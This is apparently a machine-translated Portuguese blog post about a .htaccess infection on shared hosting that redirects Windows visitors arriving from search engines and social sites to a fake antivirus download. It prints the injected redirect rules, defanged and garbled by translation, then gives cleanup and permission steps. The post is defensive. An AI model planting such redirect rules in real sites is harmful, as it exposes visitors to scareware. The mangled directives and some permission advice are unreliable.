Malware / vírus - .htaccess "reescrever" e redirecionar

Uma nova forma de vírus que ver que não sabe muito afeta sites hospedados servidores não confiáveis onde contas de usuário / contas de subdomínio podem ser "vistas" entre eles. Especificamente, as contas de hospedagem são colocadas na pasta "vhosts“, E o direito de escrever de pasta de usuário de "vhosts" é fornecido a um usuário geral ... pelo revendedor na maioria das situações. É um método típico de servidores web que não usam WHM / cPanel.

.Htaccess virus action - .htaccess hack

Vírus afeta os arquivos .htaccess o local vítima. As linhas são adicionados / Directivas para redirecionar os visitantes (vêm de yahoo, msn, google, facebook, yaindex, twitter, myspace, etc. sites e portais de alto tráfego) para alguns sites que oferecem "antivírus“. É sobre falso antivírus, Sobre o qual escrevi na introdução .

Aqui está o que parece um .htaccess afetada: (Não é possível acessar as linhas de URLs conteúdo abaixo)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine ativado

RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon *. $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. *wordpress. * $ [NC, OU]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Goto. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mamma. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pesquisa. * $ [NC, OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]

RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]

RewriteCond% {} REQUEST_FILENAME!-F
RewriteCond% {} REQUEST_FILENAME!-D
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]

Aqueles que usam WordPress eles encontrarão essas linhas no arquivo .htaccess de public_html. Além disso, o vírus cria um .htaccess idêntico na pasta wp-content.

*Existem também situações em que em vez de peoriavascularsurgery.com parece dns.thesoulfoodcafe. com ou outros endereços.

O que esse vírus está fazendo?

Uma vez redirecionado, o visitante é recebido de braços abertos pela mensagem:

Atenção!
Seu computador contém vários sinais de presença de vírus e programas de malware. seu system requer verificação antivírus imediata!
System O Security executará uma varredura rápida e gratuita em seu PC em busca de vírus e programas maliciosos.

malware 1

Não importa qual botão pressionamos, somos levados para a página "meu computador", Criado para imitar Design XP. É aqui que o "processo de digitalização" começa automaticamente, ao final do qual descobrimos que "estamos infectados".

malware 2

Depois de pressionar OK ou Cancelar, ele começará downloadde um arquivo setup.exe. Isto setup.exe é o falso antivírus afetando o sistema. Ele instalará uma série de aplicativos de malware para disseminar ainda mais os links infectados e, além disso, software anti-vírus (também falso) que a vítima é convidada a comprar.
Quem já contraiu essa forma do vírus pode usá-lo . Também é recomendado escanear todo o HDD. recomendar Kaspersky Internet Security ou Kaspersky Anti-Virus.

Esta forma de vírus afeta os sistemas operacionais dos visitantes com sistemas operacionais Windows XP, Windows ME Windows 2000, Windows NT, Windows 98 si Windows 95. Até o momento, nenhum caso de infecção de sistemas operacionais é conhecido Windows Vista sim Windows 7.

Como podemos remover este vírus .htaccess do servidor e como podemos prevenir a infecção.

1. Análise de arquivos e exclusão de códigos suspeitos. Para garantir que não apenas o arquivo seja afetado .htaccess é bom para nós analisamos todos os arquivos . Php si . Js.

2. Reescreva o arquivo .htaccess e configure-o chmod 644 ou 744 com direitos de escrita apenas em dono do usuário.

3. Ao criar uma conta de hospedagem para um site, na pasta / Home ou / webroot irá criar automaticamente uma pasta que mais frequentemente tem o nome de usuário (usuário para cpanel, ftp, etc). Para evitar a gravação de dados e a transmissão de vírus de um usuário para outro, é recomendável definir em cada pasta de usuário:

chmod 644 ou 744, 755 – 644 é indicado.
chown -R nome de usuário nome_da_pasta.
chgrp -R user_name folder_name

ls -tudo para verificar se os modos foram definidos corretamente. Algo como:

drwx - x - x 12 dinamics dinamics 4096 6 de maio 14:51 dinamics /
drwx - x - x 10 duran duran 4096 7 de março 07:46 duran /
drwx - x - x 12 tubo de ensaio tubo de ensaio 4096 29 de janeiro 11:23 tubo de ensaio /
drwxr-xr-x 14 express express 4096 26 de fevereiro de 2009 express /
drwxr-xr-x 9 ezo ezo 4096 19 de maio 01:09 ezo /
drwx - x - x 9 farma farma 4096 19 de dezembro 22:29 farma /

Se um dos usuários acima tiver no FTP Os arquivos infectados, não será possível enviar o vírus a outro usuário hospedado. É uma medida de segurança mínima para proteger contas hospedadas em um servidor web.

Elementos comuns dos domínios afetados por este tipo de vírus.

Todos os domínios afetados redirecionam os visitantes para sites que contêm "/main.php? s = 4 & H".

Esta "vírus .htaccess”Afeta qualquer tipo de CMS (Joomla, WordPress, phpBB, etc.) que usa .htaccess

.htaccess Virus Hack & Redirect.

Fundador e editor Stealth Settings, de 2006 até o presente. Experiência em sistemas operacionais Linux (Especialmente CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (CMS).

Como » AntiVírus e Segurança » Malware / vírus - .htaccess "reescrever" e redirecionar
Deixe um comentário